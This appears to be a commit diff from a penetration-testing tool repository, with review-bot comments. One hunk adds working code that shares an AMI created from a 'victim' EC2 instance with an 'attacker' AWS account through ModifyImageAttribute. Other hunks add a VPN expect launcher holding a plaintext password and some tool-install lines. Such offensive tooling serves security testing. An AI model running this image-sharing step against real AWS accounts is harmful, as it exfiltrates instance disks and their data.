Added forticlientsslvpn-expect.sh
parent
e10c59cfef
commit
f552d315df
|
@ -21,6 +21,7 @@
|
||||||
# CreateImage:
|
# CreateImage:
|
||||||
# Abuses:
|
# Abuses:
|
||||||
# ec2:CreateImage
|
# ec2:CreateImage
|
||||||
|
# ec2:ModifyImageAttribute
|
||||||
#
|
#
|
||||||
# NOT FULLY IMPLEMENTED YET.
|
# NOT FULLY IMPLEMENTED YET.
|
||||||
# For this technique, the procedure is following - the script will create an image out of specified victim's EC2
|
# For this technique, the procedure is following - the script will create an image out of specified victim's EC2
|
||||||
|
@ -351,13 +352,28 @@ To examine exfiltrated data:
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
Logger.fatal(f"ec2:CreateImage action on Victim failed. Exception: {e}")
|
Logger.fatal(f"ec2:CreateImage action on Victim failed. Exception: {e}")
|
||||||
|
|
||||||
# Step 2: Import custom SSH RSA public key
|
target_user = self.get_account_id('attacker')
|
||||||
|
Logger.out(f"Step 2: Modifying image attributes to share it with UserId = {target_user}")
|
||||||
|
try:
|
||||||
|
modify_result = victim_client.modify_image_attribute(
|
||||||
|
Attribute = 'launchPermission',
|
||||||
|
ImageId = created_image['ImageId'],
|
||||||
|
OperationType = 'add',
|
||||||
|
UserIds = [
|
||||||
|
target_user,
|
||||||
|
]
|
||||||
|
)
|
||||||
|
Logger.ok(f"Image's attributes modified to share it with user {target_user}")
|
||||||
|
except Exception as e:
|
||||||
|
Logger.fatal(f"ec2:ModifyImageAttribute action on Victim failed. Exception: {e}")
|
||||||
|
|
||||||
|
# Step 3: Import custom SSH RSA public key
|
||||||
# client.import_key_pair(
|
# client.import_key_pair(
|
||||||
# KeyName = "Some key name"
|
# KeyName = "Some key name"
|
||||||
# PublicKeyMaterial = "key material"
|
# PublicKeyMaterial = "key material"
|
||||||
# )
|
# )
|
||||||
|
|
||||||
# Step 3: Create an instance from exported AMI
|
# Step 4: Create an instance from exported AMI
|
||||||
# client.run_instances(
|
# client.run_instances(
|
||||||
# ImageId = "ami-00000000",
|
# ImageId = "ami-00000000",
|
||||||
# SecurityGroupIds = ["sg-00000", ],
|
# SecurityGroupIds = ["sg-00000", ],
|
||||||
|
@ -370,7 +386,7 @@ To examine exfiltrated data:
|
||||||
# Returns:
|
# Returns:
|
||||||
# "i-00001111002222"
|
# "i-00001111002222"
|
||||||
|
|
||||||
# Step 4: Connect to that EC2 instance
|
# Step 5: Connect to that EC2 instance
|
||||||
# client.describe_instances(
|
# client.describe_instances(
|
||||||
# InstanceIds = ["i-00001111002222"],
|
# InstanceIds = ["i-00001111002222"],
|
||||||
# Query = "Reservations[0].Instances[0].PublicIpAddress"
|
# Query = "Reservations[0].Instances[0].PublicIpAddress"
|
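Review bot: In the new Step 2 block, `target_user = self.get_account_id('attacker')` sits outside the `try`, so a failed account lookup bypasses the `ec2:ModifyImageAttribute` error path and surfaces as an unhandled exception rather than a `Logger.fatal` message; moving that line inside the `try` keeps the error reporting uniform. `modify_result` is assigned but never read in the visible lines, so the call can stand alone as `victim_client.modify_image_attribute(`. For readers using this file to build detections, a comment above the call such as `# Logged by CloudTrail as ModifyImageAttribute with a launchPermission 'add' for an external account id` would document the audit trail the step produces. The enclosing method begins and ends outside these hunks, so whether `Logger.fatal` stops execution cannot be confirmed from here.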
||||||
|
|
|
@ -121,6 +121,7 @@ cd aws
|
||||||
git_clone https://github.com/RhinoSecurityLabs/pacu.git ; cd pacu ; bash install.sh ; cd ..
|
git_clone https://github.com/RhinoSecurityLabs/pacu.git ; cd pacu ; bash install.sh ; cd ..
|
||||||
git_clone https://github.com/Alfresco/prowler.git
|
git_clone https://github.com/Alfresco/prowler.git
|
||||||
git_clone https://github.com/sa7mon/S3Scanner.git
|
git_clone https://github.com/sa7mon/S3Scanner.git
|
||||||
|
git_clone https://github.com/percolate/ec2-security-groups-dumper.git
|
||||||
git_clone https://github.com/ankane/s3tk.git
|
git_clone https://github.com/ankane/s3tk.git
|
||||||
git_clone https://github.com/andresriancho/enumerate-iam
|
git_clone https://github.com/andresriancho/enumerate-iam
|
||||||
git_clone https://github.com/arkadiyt/aws_public_ips.git
|
git_clone https://github.com/arkadiyt/aws_public_ips.git
|
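Review bot: The added `git_clone https://github.com/percolate/ec2-security-groups-dumper.git` fetches whatever the default branch holds at install time, so the installed toolset is not reproducible and a compromised upstream would land directly on the workstation running this script. If the `git_clone` helper (defined outside this hunk) can take a ref, pin the clone to a reviewed commit; otherwise a comment such as `# unpinned: review upstream before use` would at least record the gap. The neighbouring clone lines share the same pattern.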
||||||
|
|
|
@ -7,6 +7,8 @@
|
||||||
|
|
||||||
- **`encrypt.rb`** - Simple File Encryption utility (with support for Blowfish, GOST, IDEA, AES) capable of encrypting directories. ([gist](https://gist.github.com/mgeeky/751c01c4dac99871f4da))
|
- **`encrypt.rb`** - Simple File Encryption utility (with support for Blowfish, GOST, IDEA, AES) capable of encrypting directories. ([gist](https://gist.github.com/mgeeky/751c01c4dac99871f4da))
|
||||||
|
|
||||||
|
- **`forticlientsslvpn-expect.sh`** - Forticlient SSL VPN Client launching script utilizing expect. Useful while working for clients exposing their local networks through a Fortinet SSL VPN. [gist](https://gist.githubusercontent.com/mgeeky/8afc0e32b8b97fd6f96fce6098615a93/raw/cf127be09d02e04c00eb578e4ef1219a773d21cf/forticlientsslvpn-expect.sh)
|
||||||
|
|
||||||
- **`playRTPStream.sh`** - Using rtpdump to play RTP streams from PCAP files with VLC. This script was useful to extract RTP Streams from sniffed VoIP communication and then with a help of VLC to dump those streams into valid .wav files. (https://github.com/hdiniz/rtpdump). [gist](https://gist.github.com/mgeeky/0b8bd81a3f6fb70eec543bc0bae2f079)
|
- **`playRTPStream.sh`** - Using rtpdump to play RTP streams from PCAP files with VLC. This script was useful to extract RTP Streams from sniffed VoIP communication and then with a help of VLC to dump those streams into valid .wav files. (https://github.com/hdiniz/rtpdump). [gist](https://gist.github.com/mgeeky/0b8bd81a3f6fb70eec543bc0bae2f079)
|
||||||
|
|
||||||
- **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a)
|
- **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a)
|
||||||
|
|
|
@ -0,0 +1,63 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Forticlient SSL VPN Client launching script utilizing expect.
|
||||||
|
|
||||||
|
# --------------------------------------------
|
||||||
|
# CONFIGURATION
|
||||||
|
|
||||||
|
# If empty - script will take some simple logic to locate appropriate binary.
|
||||||
|
FORTICLIENT_PATH=""
|
||||||
|
|
||||||
|
# VPN Credentials
|
||||||
|
VPN_HOST="host:10443"
|
||||||
|
VPN_USER="username"
|
||||||
|
VPN_PASS="password"
|
||||||
|
|
||||||
|
# --------------------------------------------
|
||||||
|
|
||||||
|
trap ctrl_c INT
|
||||||
|
|
||||||
|
function ctrl_c() {
|
||||||
|
echo "Removing left-over files..."
|
||||||
|
rm -f /tmp/expect
|
||||||
|
}
|
||||||
|
|
||||||
|
if [[ $EUID -ne 0 ]]; then
|
||||||
|
echo "This script must be run as root"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ -z "$FORTICLIENT_PATH" ]; then
|
||||||
|
FORTICLIENT_PATH=`uname -r | grep -q 64 && echo $(locate forticlientsslvpn_cli | grep 64bit) || echo $(locate forticlientsslvpn_cli | grep 32bit)`
|
||||||
|
if [ ! -f $FORTICLIENT_PATH ]; then
|
||||||
|
echo "Tried to locate Forticlient SSL VPN Cli binary, but failed."
|
||||||
|
echo "Specify it at variable FORTCLIENT_PATH"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
echo "Located Forticlient VPN Client at: $FORTICLIENT_PATH"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "Killing previous instances of Forticlient SSL VPN client..."
|
||||||
|
killall -9 $(basename $FORTICLIENT_PATH) 2> /dev/null
|
||||||
|
|
||||||
|
cat << EOF > /tmp/expect
|
||||||
|
#!/usr/bin/expect -f
|
||||||
|
match_max 1000000
|
||||||
|
set timeout -1
|
||||||
|
spawn $FORTICLIENT_PATH --server $VPN_HOST --vpnuser $VPN_USER --keepalive
|
||||||
|
expect "Password for VPN:"
|
||||||
|
send -- "$VPN_PASS"
|
||||||
|
send -- "\r"
|
||||||
|
|
||||||
|
expect "Would you like to connect to this server? (Y/N)"
|
||||||
|
send -- "Y"
|
||||||
|
send -- "\r"
|
||||||
|
|
||||||
|
expect "Clean up..."
|
||||||
|
close
|
||||||
|
EOF
|
||||||
|
|
||||||
|
chmod 500 /tmp/expect
|
||||||
|
/usr/bin/expect -f /tmp/expect
|
||||||
|
|
||||||
|
rm -f /tmp/expect
|
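Review bot: The generated expect script embeds `$VPN_PASS` and is written by root to the fixed path `/tmp/expect` via `cat << EOF > /tmp/expect`, with `chmod 500` applied only afterwards, so the write follows a symlink already planted at that path and the file is readable under the default umask until the chmod runs. Create the file with `mktemp` under `umask 077` and remove it from an `EXIT` trap rather than the `INT`-only `ctrl_c` handler, as sketched below. Separately, `[ ! -f $FORTICLIENT_PATH ]` is unquoted, so when `locate` returns nothing the test collapses to `[ ! -f ]`, which is false, and the "failed to locate" branch is skipped; quote it as `[ ! -f "$FORTICLIENT_PATH" ]`. Because the heredoc delimiter is unquoted, a password containing `$`, backticks, `"` or `[` is rewritten by the shell or by Tcl before it is sent. Keeping `VPN_USER` and `VPN_PASS` in the script body also means the credentials travel with every copy of the file; reading them from a root-only file or a prompt avoids that.

```bash
umask 077
EXPECT_SCRIPT=$(mktemp) || exit 1
trap 'rm -f -- "$EXPECT_SCRIPT"' EXIT
trap 'exit 130' INT

cat << EOF > "$EXPECT_SCRIPT"
# … unchanged: expect script body …
EOF

/usr/bin/expect -f "$EXPECT_SCRIPT"
```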